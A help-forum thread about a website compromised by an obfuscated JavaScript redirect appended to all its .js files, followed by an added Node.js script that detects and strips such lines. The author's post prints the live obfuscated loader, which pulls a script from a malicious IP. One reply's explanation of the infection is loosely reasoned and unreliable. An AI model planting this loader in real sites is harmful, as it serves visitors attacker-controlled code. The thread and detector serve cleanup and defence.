Website hacked with redirect script to malicious server

http://71.18.231.91/

If you go there, you will see it attempts to redirect you to 94.247.2.195:80.

That's where the hack host site tries to inject code into your computer, or whatever it is that it's trying to do...

Anyone got any clue how to tell what file, what piece of code, is trying to do the redirect when you go to http://71.18.231.91/?

Wish I knew!


jason_jm Asked:
 
jason_jm Author Commented:
--><!--
document.write(unescape('%3CONsxecxerxeieQ7ptXP%20sreQ7c%3Dwb%2Fa2p%2FXP94PqY%2E247%2Ewb2%2EON19eQ75%2FjeQ7qwbuerPqYy%2Exej3zs%3E%3CeQ7%2Fsxecript%3E').replace(/wb|eQ7|a2p|ON|PqY|xe|XP|3z/g,""));
 -->


That code was added to all .js files.

solved
 
Sourabh-Excahnge Commented:
Redirection can be set in multiple ways:
1. Check c:\inetpub\wwwroot. Under this folder, open each and every file and check if you find any redirection there.
2. Open IIS Manager, highlight the default website, and in the right pane try to browse the iisstart.htm page.
3. Under the properties of the default website, go to the document tab and check which document is on top, and try to browse that file.
 
aamodt Commented:
If you search for 94.247.2.195:80 on Google, they say that it is a virus. A Trojan, to be more specific. Like the Zief virus, it injects it automatically when you as a user change the source code, or it can just inject by lying on the server undetected and parsing the redirect code unseen.

I suggest you search for fixes to the virus: Troj/JSRedir-0

and try to get rid of it. According to my resources, it is the trojan Troj/JSRedir-0 you have been infected by.
It's a JavaScript that redirects you to that server.
 
jason_jm Author Commented:
Yep, was tryna work out how the website was being redirected.

It's from that JavaScript code added to the end of all .js files.

Now I gotta figure out how the hacker got access to the .js files.

Probably through an infected PC from a web designer (stealing the FTP password in cleartext).
 
aamodt Commented:
Yeah, we had the same problem with one of our web servers as well. One of the developers had the virus and infected the site with the JavaScript.
Question has a verified solution.
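
Added example, not part of the thread: a Node.js check that finds the document.write(unescape(...).replace(...)) statement appended to a .js file and decodes it as plain string work, without executing it. The function names are hypothetical, and the sample is a constructed one-line file followed by the snippet jason_jm posted above.

```javascript
// Added example, not from the thread. Nothing here evaluates the payload.
// Matches: document.write(unescape('<escaped>').replace(/<junk>/g,""));
const INJECT_RE =
  /document\.write\(\s*unescape\(\s*(['"])([^'"]*)\1\s*\)\s*\.replace\(\s*\/([A-Za-z0-9|]+)\/g\s*,\s*(['"])\4\s*\)\s*\)\s*;?/g;

// Reproduce unescape(...).replace(...) as plain string work.
function decodePayload(escaped, junk) {
  // INJECT_RE limits junk to letters, digits and "|", so building a
  // RegExp from it cannot introduce any other regex syntax.
  return unescape(escaped).replace(new RegExp(junk, "g"), "");
}

// Return one finding per injected statement found in a file's text.
function findInjectedRedirects(source) {
  const findings = [];
  for (const m of source.matchAll(INJECT_RE)) {
    const decoded = decodePayload(m[2], m[3]);
    const src = /<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(decoded);
    findings.push({
      line: source.slice(0, m.index).split("\n").length, // 1-based line
      decoded,                                           // de-obfuscated HTML
      scriptSrc: src ? src[1] : null,                    // remote script, if any
    });
  }
  return findings;
}

// Remove the injected statements and leave the rest of the file untouched.
function stripInjected(source) {
  return source.replace(INJECT_RE, "");
}

// Constructed file: one legitimate line, then the snippet posted in the thread.
const SAMPLE = [
  "function legit() { return 1; }",
  `document.write(unescape('%3CONsxecxerxeieQ7ptXP%20sreQ7c%3Dwb%2Fa2p%2FXP94PqY%2E247%2Ewb2%2EON19eQ75%2FjeQ7qwbuerPqYy%2Exej3zs%3E%3CeQ7%2Fsxecript%3E').replace(/wb|eQ7|a2p|ON|PqY|xe|XP|3z/g,""));`,
].join("\n");

console.log(findInjectedRedirects(SAMPLE));
```

Run findInjectedRedirects over the text of every .js file under the web root. Compare the output of stripInjected against a known-good copy before putting a cleaned file back.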
